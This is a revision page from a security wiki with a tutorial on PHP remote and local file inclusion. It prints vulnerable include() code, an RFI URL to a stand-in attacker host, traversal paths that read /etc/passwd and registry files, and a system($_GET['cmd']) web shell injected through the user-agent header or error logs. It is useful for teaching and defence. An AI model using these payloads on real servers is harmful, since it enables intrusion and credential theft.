Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "File Inclusion"

From NetSec
Jump to: navigation, search
(Introduction)
(Remote File Inclusion)
Line 18: Line 18:
  
 
==Remote File Inclusion==
 
==Remote File Inclusion==
 +
 +
Remote file inclusion refers to including a file that resides outside of the target site. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.
  
 
The example URI of a vulnerable site will be '''/include.php?file=howto.php'''  
 
The example URI of a vulnerable site will be '''/include.php?file=howto.php'''  
Line 49: Line 51:
 
   <nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki>
 
   <nowiki>/include.php?file=http://evil.webserver/include.txt</nowiki>
  
and then gain access to every single username and [[password]] (or [[password]] hash) that is stored in the [[database]].  This can also allow for remote code execution as well as the spawning of a remote shell.
+
If include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side, allowing for abritrary code execution.
  
 
{{notice|This is known as Remote File Inclusion or RFI.}}
 
{{notice|This is known as Remote File Inclusion or RFI.}}

Revision as of 21:40, 28 June 2012

File inclusion refers to the process of manipulating unsanitised inputs that make use of PHP's include() function into including files that were not intended to be included. This can be used for the disclosure of privileged information (such as the contents of the /etc/shadow file) or including a file that contains some arbitrary code created by the attacker, and thus causing the server to run this code. File inclusion refers in a general sense to the inclusion of an unintended file, whereas file disclosure refers specifically to using file inclusion to obtain sensitive information.

File inclusion is a vulnerability that exists because of PHP's include() function accepting a variable as a parameter.


Introduction

This attack can be automated quickly using lfi_autopwn.pl.

PHP's include() function does not merely include a library as similar functions do in C and other programming languages. It also executes any PHP code in the included file on the server side. As a result, if arbitrary code selected by the attacker can be included, it is possible to perform remote command execution.

When a programmer allows a file to be selected for inclusion via any HTTP input, this creates a File Inclusion vulnerability. By providing unexpected inputs that cause sensitive or attacker-controlled files to be included, information can be disclosed and execution can be hijacked.

To patch this type of vulnerability, one may employ whitelisting or simply stop allowing user input to specify files for inclusion. There are many prepackaged solutions and techniques to stop file inclusion vulnerabilities, although most of them can be bypassed with enough ingenuity. Where possible, it is better to avoid allowing user input to be directly translated into a file inclusion path.

c3el4.png This could be classified as a design flaw in PHP for allowing the inclusion of remote files to begin with, or for accepting a variable in its include() function.

Remote File Inclusion

Remote file inclusion refers to including a file that resides outside of the target site. As recent versions of PHP have built-in safeguards that prevent remote inclusion unless it is explicitly enabled by the administrator, this form of vulnerability is now incredibly rare.

The example URI of a vulnerable site will be /include.php?file=howto.php

PHP for this may look like:

 
 <HTML>
 <TITLE>Page Title</TITLE>
 <BODY>
 
 
 <?php
 include($_GET['file']);
 ?>
 
 
 </BODY></HTML>
 
RPU0j.png The above PHP code is vulnerable. Do not use this on your site!

An attacker that sees

 /include.php?file=howto.php

may change the URL to

 /include.php?file=http://evil.webserver/include.txt

If include.txt contains some php code designed by the attacker, this will cause this code to be executed on the server side, allowing for abritrary code execution.

Notice: This is known as Remote File Inclusion or RFI.

Local File Inclusion

Local file inclusion can be just as dangerous if not more so. Local file inclusion occurs when the PHP code at /local.php?file=welcome looks similar to the following, however allow_url_fopen and allow_url_includes has been disabled in the PHP configuration. This will only allow the attacker to access local files:

 
<?php
   include($_GET['file']);
?>
 

This is similar to the Remote File Inclusion vulnerability, however reviewing the code it can be seen that PHP is reading from a file on the local machine and then displaying it on the web page. The problem with this type of code is that now, instead of relinquishing execute, write, and read level permissions to an attacker, the programmer has still relinquished read level permissions to the attacker. Using this knowledge, the attacker can then specify a file on the remote host that the PHP server has permission to read and that file will be displayed in the web page. For example, the name of the file that contains the registry in windows is ntusers.dat in the windows directory. The attacker may request the URL:


 /local.php?file=../../../../../../../../../../../../../WINDOWS/ntusers.dat

Because local.php is vulnerable, it will display the registry of vuln.net in the attacker’s web browser. The attacker can then use the information gleaned from the registry to gather username and password hash combinations and begin cracking them. The first time the attacker sees a URL containing .php?file=, the attacker will most likely attempt a remote file inclusion. If that fails, the attacker will then most likely attempt local file inclusion. Both of these techniques can be used for cross-site scripting attacks.

c3el4.png A null Byte can be used to prevent concatenation in a script. For example, many scripts may append '.php' to a user supplied string in an include. Appending a null Byte (%00) will often short circuit this, allowing an attacker to include any file, regardless of extension.

If the remote host is a UNIX or Linux based system, the attacker may be able to view /etc/passwd or /proc/cpuinfo with this technique:

 /local.php?file=../../../../../../../../../../../../../etc/passwd

Or using null-bytes:

 /local.php?file=../../../../../../../../../../../../../etc/passwd%00

Because the file is being included, this means that the attacker can see it if it is a text file, or execute any php inside of it.

Two common input vectors for injecting PHP code are the "user-agent" and the httpd error log. The user-agent can be accessed through /proc/self/environ. Therefore, if a browser sends a user-agent string containing PHP code :

 
<?php
   system($_GET['cmd']);
?>
 
RPU0j.png The above PHP code is vulnerable. Do not use this on your site!

and accesses the file:

 /local.php?file=../../../../../../../../../../../../../proc/self/environ?cmd=whoami

They can retrieve the Linux or Unix username (output of the whoami command) in the return HTML of the PHP file.

The other method is to use the telnet command and cause a 404 error with a GET request:

 
 
 
GET <?php system($_GET['cmd']) ?> 
 

And then retrieve the following URL for the same output:

 /local.php?file=../../../../../../../../../../../../../usr/local/apache/log/error_log?cmd=whoami
Notice: Log file location may vary

File Inclusion is part of a series on exploitation.
<center>
</center>